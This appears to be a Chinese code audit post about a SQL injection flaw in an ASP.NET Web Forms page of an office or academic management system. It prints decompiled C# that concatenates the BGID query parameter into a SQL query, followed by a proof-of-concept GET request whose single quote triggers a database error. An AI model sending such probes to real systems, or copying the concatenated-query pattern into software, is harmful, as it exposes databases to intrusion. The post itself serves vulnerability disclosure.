ASP.NET代码审计 Web Forms框架 SQL注入漏洞

OAGL_GZJH_OA_GZJH_BG_DOC.cs代码

cs 复制代码
using System;
using System.Data;
using System.IO;
using System.Web.Profile;
using System.Web.SessionState;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using ASP;
using CwhASPNETBaseNew;
using QzJiaoWu.Web;

public class OAGL_GZJH_OA_GZJH_BG_DOC : PageBaseNew, IRequiresSessionState
{
	protected HyperLink LB1;

	protected HtmlForm Form1;

	protected DefaultProfile Profile => (DefaultProfile)Context.Profile;

	protected global_asax ApplicationInstance => (global_asax)Context.ApplicationInstance;

	protected override void LoadPage(object sender, EventArgs e)
	{
		//IL_0001: Unknown result type (might be due to invalid IL or missing references)
		//IL_000b: Expected O, but got Unknown
		DAOP = new DataOperation();
		string text = base.Request.QueryString["BGID"].Trim();
		string text2 = base.Request.QueryString["SQLB"].Trim();
		DataTable dataTable = DAOP.getDataTable("select * from OA_BG where BGID = '" + text + "'");
		if (dataTable.Rows.Count > 0)
		{
			string text3 = "";
			text3 = base.Server.MapPath("../../upload/OAGL/") + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";
			if (File.Exists(text3))
			{
				LB1.Text = dataTable.Rows[0]["BGBT"].ToString();
				LB1.NavigateUrl = "../../upload/OAGL/" + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";
			}
			else
			{
				LB1.Text = "没有相关附件下载";
			}
		}
		else
		{
			LB1.Text = "没有相关附件下载";
		}
	}
}

关键代码分析

参数BGID直接拼接sql语句造成sql注入漏洞

POC

cs 复制代码
GET /OAGL/GZJH/OA_GZJH_BG_DOC.aspx?BGID='&SQLB= HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

单引号报错语法错误